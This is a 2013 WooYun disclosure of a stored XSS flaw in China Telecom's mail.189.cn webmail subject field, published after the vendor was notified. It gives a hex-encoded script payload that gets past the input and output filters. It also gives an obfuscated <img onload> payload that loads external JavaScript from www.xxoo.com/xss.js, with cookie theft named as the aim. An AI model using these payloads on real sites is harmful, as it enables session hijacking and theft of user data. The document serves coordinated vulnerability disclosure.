当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-027826

漏洞标题:中国电信mail.189.cn存储型Xss漏洞

相关厂商:中国电信

漏洞作者: J′aron

提交时间:2013-07-05 12:08

修复时间:2013-08-19 12:09

公开时间:2013-08-19 12:09

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:12

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-07-05: 细节已通知厂商并且等待厂商处理中
2013-07-09: 厂商已经确认,细节仅向厂商公开
2013-07-19: 细节向核心白帽子及相关领域专家公开
2013-07-29: 细节向普通白帽子公开
2013-08-08: 细节向实习白帽子公开
2013-08-19: 细节向公众公开

简要描述:

中国电信mail.189.cn Xss漏洞

详细说明:

首先对输入过滤进行测试,一般最开始就测试邮件内容方面:使用<script>alert(‘xss’)</script>

1.png


在主题和内容部分,填写,在输入的时候,主题地方过滤了,内容木有过滤,输入过滤不代表能XSS(很多原因),
下面开始研究主题的XSS过滤。经过一般测试,发现< >标签都已经过滤,就没测试其他标签,琢磨使用编码来测试,输入\x3C\x73\x63\x72\x69\x70\x74\x3E(<script>的编码)

2.png


发现并木有在输入过滤,那么,这说明只要输出没有过滤就能XSS到,而且在主题处的XSS,只要登录邮箱就会被xxoo,把代码补全,

3.png


然后发送给本测试账号。来试试绕过输出

4.png


给出测试代码:\x3C\x73\x63\x72\x69\x70\x74\x3E\x61\x6C\x65\x72\x74\x28\x27\x58\x53\x53\x27\x29\x3B\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E
等我们发送成功,然后同时也接受到了邮件,刷新,弹了:

5.png

绕过输入和输出了!成功XSS到。
当然弹框不是目的,存储型的危害相当大,盗取cookie或者是其他的操作才是目的,
然后自己写一段,
比如我调用的www.xxoo.com/xss.js,
我们可以使用<img标签,然后加1个onload事件去调用外部的js代码,未加密前代码为:
<img/src=”#”onload=”window.s=document.createElement(String.fromCharCode(115,99,114,105,112,116));window.s.src=String.fromCharCode(119,119,119,46,120,120,111,111,46,99,111,109,47,120,115,115,46,106,115);document.body.appendChild(window.s)”>
然后encode。

6.png

漏洞证明:

如上。

修复方案:

我可以大胆说- -洞不是我挖的。。不懂- -你们比我还专业。

版权声明:转载请注明来源 J′aron@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:7

确认时间:2013-07-09 23:30

厂商回复:

最新状态:

暂无